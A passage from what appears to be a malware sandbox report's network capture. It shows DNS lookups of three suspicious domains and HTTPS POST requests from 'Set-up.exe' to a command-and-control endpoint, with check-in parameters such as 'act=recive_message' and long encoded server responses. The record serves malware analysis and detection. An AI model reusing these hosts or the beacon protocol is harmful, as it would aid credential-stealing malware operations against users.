                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.959652901 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.959697962 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.959706068 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.959732056 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.959750891 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.985271931 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.985289097 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.985362053 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.985375881 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.985419035 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.985620975 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.985636950 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.985676050 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.985682011 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.985724926 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986008883 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986026049 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986069918 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986077070 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986108065 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986140966 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986336946 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986351967 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986385107 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986391068 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986418009 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986437082 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986612082 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986629009 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986677885 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986685038 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:33.986728907 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.045840979 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.045859098 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.046142101 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.046156883 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.046214104 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.046310902 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.046328068 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.046386003 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.046391964 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.046430111 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.046765089 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.046781063 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.046832085 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.046839952 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.046883106 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.072493076 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.072509050 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.072588921 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.072602987 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.072638988 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.072817087 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.072833061 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.072870016 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.072877884 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.072902918 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.072918892 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073196888 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073213100 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073246956 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073254108 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073281050 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073295116 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073328018 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073344946 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073379993 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073385954 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073411942 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073429108 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073450089 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073467970 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073503971 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073509932 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073530912 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.073553085 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133074999 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133091927 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133143902 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133163929 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133174896 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133183956 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133202076 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133203983 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133219957 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133236885 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133275032 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133377075 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133392096 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133433104 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133486032 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.133590937 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.157649994 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.157649994 CET49758443192.168.2.4172.67.208.58
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.157677889 CET44349758172.67.208.58192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:34.157687902 CET44349758172.67.208.58192.168.2.4

                                                                                                                                                                                                                                                            UDP Packets

                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:15.812124014 CET5490853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:15.826906919 CET53549081.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:26.153345108 CET6471153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:26.260864973 CET53647111.1.1.1192.168.2.4
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:27.179639101 CET5996253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:27.193217993 CET53599621.1.1.1192.168.2.4

                                                                                                                                                                                                                                                            DNS Queries

                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:15.812124014 CET192.168.2.41.1.1.10xaa58Standard query (0)cellardesiresso.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:26.153345108 CET192.168.2.41.1.1.10x67d0Standard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:27.179639101 CET192.168.2.41.1.1.10xaf5dStandard query (0)klipvumisui.shopA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                            DNS Answers

                                                                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:15.826906919 CET1.1.1.1192.168.2.40xaa58No error (0)cellardesiresso.sbs104.21.87.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:15.826906919 CET1.1.1.1192.168.2.40xaa58No error (0)cellardesiresso.sbs172.67.139.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:26.260864973 CET1.1.1.1192.168.2.40x67d0No error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:27.193217993 CET1.1.1.1192.168.2.40xaf5dNo error (0)klipvumisui.shop172.67.208.58A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                            Jan 5, 2025 18:53:27.193217993 CET1.1.1.1192.168.2.40xaf5dNo error (0)klipvumisui.shop104.21.37.128A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                                                                                                                            • cellardesiresso.sbs
                                                                                                                                                                                                                                                            • cegu.shop
                                                                                                                                                                                                                                                            • klipvumisui.shop

                                                                                                                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            0192.168.2.449748104.21.87.84433492C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-05 17:53:16 UTC266OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 8
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
                                                                                                                                                                                                                                                            2025-01-05 17:53:16 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                                                                                                                            2025-01-05 17:53:16 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:16 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=bq07q1u8clnha72smnq3n2h4h0; expires=Thu, 01 May 2025 11:39:55 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=At6leZwR%2BJPMn%2FdD9HmG1Y3jYaLUDm7nB7zF0nNInNCESy7h84wBYl9H37mA3gOJZg2UhaPH%2BRfx%2FbcIBSDNP1Ypvw3HYYxdS3UpmPit73r3G2jOD0y0isma7tQMKzt6P90vOxCv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553adadab7d1c-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1897&rtt_var=774&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=910&delivery_rate=1360037&cwnd=157&unsent_bytes=0&cid=fbcb3ad17d77986f&ts=568&x=0"
                                                                                                                                                                                                                                                            2025-01-05 17:53:16 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 2ok
                                                                                                                                                                                                                                                            2025-01-05 17:53:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            1192.168.2.449749104.21.87.84433492C:\Users\user\Desktop\Set-up.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            2025-01-05 17:53:17 UTC267OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                            Content-Length: 79
                                                                                                                                                                                                                                                            Host: cellardesiresso.sbs
                                                                                                                                                                                                                                                            2025-01-05 17:53:17 UTC79OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 68 52 6a 7a 47 33 2d 2d 4a 45 4e 59 41 26 6a 3d 65 66 64 65 62 64 65 30 35 37 61 31 64 66 33 66 37 63 31 35 62 37 66 34 64 61 39 30 37 63 32 64
                                                                                                                                                                                                                                                            Data Ascii: act=recive_message&ver=4.0&lid=hRjzG3--JENYA&j=efdebde057a1df3f7c15b7f4da907c2d
                                                                                                                                                                                                                                                            2025-01-05 17:53:17 UTC1133INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 17:53:17 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Set-Cookie: PHPSESSID=bup561u08hcihf0j0d6culg909; expires=Thu, 01 May 2025 11:39:56 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMX%2Bnq6DwwTnn2e6jkHx2%2FnxrFmfp2fQ2AsSd82XdPpglx1c8s5HuJ%2Fz90ZdaQpT53O0BuoomoHwTQJZAB1moirwEdhylI20OvtgCPSwydO7rjbf0%2F%2Fc%2FOB9lkycCsQGGJW%2FMCoi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            CF-RAY: 8fd553b41b874401-EWR
                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1675&min_rtt=1656&rtt_var=659&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=982&delivery_rate=1614151&cwnd=233&unsent_bytes=0&cid=20502cc2702fd80f&ts=554&x=0"
                                                                                                                                                                                                                                                            2025-01-05 17:53:17 UTC236INData Raw: 31 64 31 39 0d 0a 4f 65 54 4c 30 50 69 4b 72 51 57 57 6d 6f 33 58 39 46 39 43 76 5a 31 62 35 71 38 41 2b 38 6a 71 57 49 37 4d 7a 73 77 42 7a 57 31 43 78 72 33 79 77 72 36 42 4a 2b 58 2f 72 2b 32 53 50 69 37 4f 2b 48 66 45 7a 6d 54 5a 38 6f 77 35 34 72 2b 72 34 43 4f 37 41 42 76 65 72 62 47 55 2b 63 67 70 74 50 2f 31 39 63 34 45 4f 5a 2f 34 4e 63 53 56 49 70 36 69 69 44 6e 69 72 71 2b 6e 62 72 30 42 57 6f 79 6e 74 35 44 76 7a 6d 48 33 39 75 43 79 6b 54 6f 6a 31 2f 4d 79 69 38 64 74 32 65 54 49 50 66 54 75 39 4f 35 4d 71 42 6c 59 71 61 71 6a 6b 36 6a 51 4b 65 32 34 36 4c 6e 57 5a 57 44 63 2b 44 6d 4b 79 57 53 51 6f 49 49 77 36 71 2b 71 70 6e 47 6b 43 31 47 4d 71 62 53 52 35 63 64 31 2b 76 7a 6e 75 5a
                                                                                                                                                                                                                                                            Data Ascii: 1d19OeTL0PiKrQWWmo3X9F9CvZ1b5q8A+8jqWI7MzswBzW1Cxr3ywr6BJ+X/r+2SPi7O+HfEzmTZ8ow54r+r4CO7ABverbGU+cgptP/19c4EOZ/4NcSVIp6iiDnirq+nbr0BWoynt5DvzmH39uCykToj1/Myi8dt2eTIPfTu9O5MqBlYqaqjk6jQKe246LnWZWDc+DmKyWSQoIIw6q+qpnGkC1GMqbSR5cd1+vznuZ
                                                                                                                                                                                                                                                            2025-01-05 17:53:17 UTC1369INData Raw: 63 77 49 35 2b 78 65 59 50 56 49 73 48 71 32 77 6a 76 76 37 32 37 62 72 38 4a 47 35 6e 6e 71 39 72 76 77 79 65 73 75 4f 65 35 6d 44 67 6a 30 50 67 34 68 4e 39 74 6d 61 6d 41 4d 75 69 6b 6f 36 46 73 6f 51 56 63 6a 71 43 31 6c 65 2f 48 59 66 76 37 72 2f 76 57 4f 6a 69 66 70 33 6d 6b 33 57 47 61 76 6f 55 72 72 4c 48 69 74 79 4f 6f 41 78 76 65 36 62 53 55 36 63 4a 6e 35 76 44 6b 76 70 4d 76 4b 39 62 79 4e 49 54 41 61 4a 61 70 69 44 33 6d 70 4b 4f 6b 5a 36 49 43 58 59 61 70 38 74 53 6f 79 48 2b 30 6f 4b 2b 57 6b 79 30 6e 30 2b 6c 37 76 6f 31 39 31 37 50 49 50 65 44 75 39 4f 35 72 71 67 78 59 6a 61 61 78 6b 75 50 64 5a 2b 62 2b 34 72 43 45 4f 79 58 52 39 54 71 57 78 32 79 66 71 59 45 78 35 61 75 72 71 69 50 68 54 31 79 65 36 65 72 61 79 63 4a 73 2b 50 4c 34 74
                                                                                                                                                                                                                                                            Data Ascii: cwI5+xeYPVIsHq2wjvv727br8JG5nnq9rvwyesuOe5mDgj0Pg4hN9tmamAMuiko6FsoQVcjqC1le/HYfv7r/vWOjifp3mk3WGavoUrrLHityOoAxve6bSU6cJn5vDkvpMvK9byNITAaJapiD3mpKOkZ6ICXYap8tSoyH+0oK+Wky0n0+l7vo1917PIPeDu9O5rqgxYjaaxkuPdZ+b+4rCEOyXR9TqWx2yfqYEx5aurqiPhT1ye6eraycJs+PL4t
                                                                                                                                                                                                                                                            2025-01-05 17:53:17 UTC1369INData Raw: 4e 2f 7a 57 57 77 57 69 66 70 59 55 32 72 4f 44 73 71 58 76 76 56 78 75 73 71 71 61 5a 34 6f 31 53 39 2f 62 68 73 6f 42 39 50 35 48 6d 65 59 50 42 49 73 48 71 68 54 76 6b 71 4c 36 68 62 71 77 42 56 59 6d 73 76 5a 4c 6f 7a 32 72 78 2f 4f 53 2b 6c 54 41 6b 7a 66 55 35 6a 4d 68 6a 6b 36 44 49 64 4b 79 70 74 4f 34 37 37 7a 35 4d 6a 65 75 48 6d 65 62 42 59 4f 4b 34 38 50 75 50 66 53 66 54 76 32 48 45 77 47 71 63 72 34 63 37 35 71 43 70 70 47 2b 6e 41 56 69 55 70 72 61 61 35 4d 64 74 2b 66 62 72 76 5a 38 32 4b 39 6e 2f 4f 49 36 4e 4c 4e 6d 74 6b 48 71 30 37 70 69 70 62 36 49 41 47 62 4f 71 76 4a 54 76 32 53 66 72 74 76 62 31 6b 54 46 67 68 37 38 31 6a 63 31 70 6b 36 36 49 50 65 47 72 72 36 6c 67 6f 67 68 52 69 4b 36 32 6c 75 48 43 59 66 54 2f 36 37 43 45 4f 43
                                                                                                                                                                                                                                                            Data Ascii: N/zWWwWifpYU2rODsqXvvVxusqqaZ4o1S9/bhsoB9P5HmeYPBIsHqhTvkqL6hbqwBVYmsvZLoz2rx/OS+lTAkzfU5jMhjk6DIdKyptO477z5MjeuHmebBYOK48PuPfSfTv2HEwGqcr4c75qCppG+nAViUpraa5Mdt+fbrvZ82K9n/OI6NLNmtkHq07pipb6IAGbOqvJTv2Sfrtvb1kTFgh781jc1pk66IPeGrr6lgoghRiK62luHCYfT/67CEOC
                                                                                                                                                                                                                                                            2025-01-05 17:53:17 UTC1369INData Raw: 73 63 4e 30 32 62 58 47 49 36 79 70 6f 4f 34 37 37 77 5a 53 6c 4b 65 38 6b 2b 58 4a 62 2f 50 32 34 72 36 51 4e 69 66 59 2b 54 53 4d 77 47 65 61 71 34 77 77 2f 71 32 6e 70 47 36 6c 54 78 58 47 72 71 72 61 73 49 39 41 2b 4e 48 2f 72 6f 51 72 59 4d 43 78 49 4d 54 4b 62 74 6e 79 79 44 6e 6a 70 36 4f 6d 61 36 41 41 58 34 69 76 74 4a 66 74 77 47 33 6d 38 4f 47 34 6e 54 49 72 7a 66 38 30 67 4d 46 6d 6b 61 47 43 65 71 4c 75 71 37 59 6a 39 30 39 75 69 36 61 79 6d 66 36 50 65 4c 72 68 72 37 4b 61 66 58 69 66 38 7a 65 45 77 6d 36 56 6f 59 41 37 34 4b 43 72 71 32 71 6e 42 30 6d 48 72 62 71 62 35 73 42 6d 38 50 33 71 73 5a 45 35 4a 74 43 2f 64 38 54 4b 65 74 6e 79 79 42 58 4c 6d 2b 36 50 57 65 38 51 46 5a 2f 70 74 5a 61 6f 6c 79 66 34 2b 2b 4f 39 6d 54 73 70 30 2f 55
                                                                                                                                                                                                                                                            Data Ascii: scN02bXGI6ypoO477wZSlKe8k+XJb/P24r6QNifY+TSMwGeaq4ww/q2npG6lTxXGrqrasI9A+NH/roQrYMCxIMTKbtnyyDnjp6Oma6AAX4ivtJftwG3m8OG4nTIrzf80gMFmkaGCeqLuq7Yj909ui6aymf6PeLrhr7KafXif8zeEwm6VoYA74KCrq2qnB0mHrbqb5sBm8P3qsZE5JtC/d8TKetnyyBXLm+6PWe8QFZ/ptZaolyf4++O9mTsp0/U
                                                                                                                                                                                                                                                            2025-01-05 17:53:17 UTC1369INData Raw: 4a 4b 75 69 7a 37 70 6f 61 32 76 5a 62 30 49 55 70 53 6e 76 35 58 67 78 32 37 31 2f 4f 71 34 6b 44 45 71 33 76 67 33 69 73 55 69 31 2b 71 50 49 71 7a 32 37 49 39 7a 74 42 31 4e 69 34 69 2f 6c 61 6a 51 4b 65 32 34 36 4c 6e 57 5a 57 44 57 37 54 32 4a 33 32 75 65 70 49 63 35 2f 71 2b 68 70 58 47 6f 41 46 2b 42 70 62 53 56 37 73 35 69 2f 76 54 6f 73 4a 30 79 4c 4a 2b 78 65 59 50 56 49 73 48 71 70 6a 48 2f 75 61 2b 67 61 4c 6b 55 47 35 6e 6e 71 39 72 76 77 79 65 73 75 4f 79 2b 6e 54 6b 67 30 2f 38 39 69 63 31 77 6c 71 32 50 4d 2b 65 38 70 71 6c 6b 70 41 64 51 69 61 2b 67 6c 75 62 64 59 75 62 71 72 2f 76 57 4f 6a 69 66 70 33 6d 79 79 6e 4b 4a 71 63 6f 4c 2b 71 32 36 70 57 36 6a 54 30 54 49 73 50 4b 64 35 49 38 2f 74 50 37 67 76 4a 55 79 49 64 62 7a 4e 49 48 45
                                                                                                                                                                                                                                                            Data Ascii: JKuiz7poa2vZb0IUpSnv5Xgx271/Oq4kDEq3vg3isUi1+qPIqz27I9ztB1Ni4i/lajQKe246LnWZWDW7T2J32uepIc5/q+hpXGoAF+BpbSV7s5i/vTosJ0yLJ+xeYPVIsHqpjH/ua+gaLkUG5nnq9rvwyesuOy+nTkg0/89ic1wlq2PM+e8pqlkpAdQia+glubdYubqr/vWOjifp3myynKJqcoL+q26pW6jT0TIsPKd5I8/tP7gvJUyIdbzNIHE
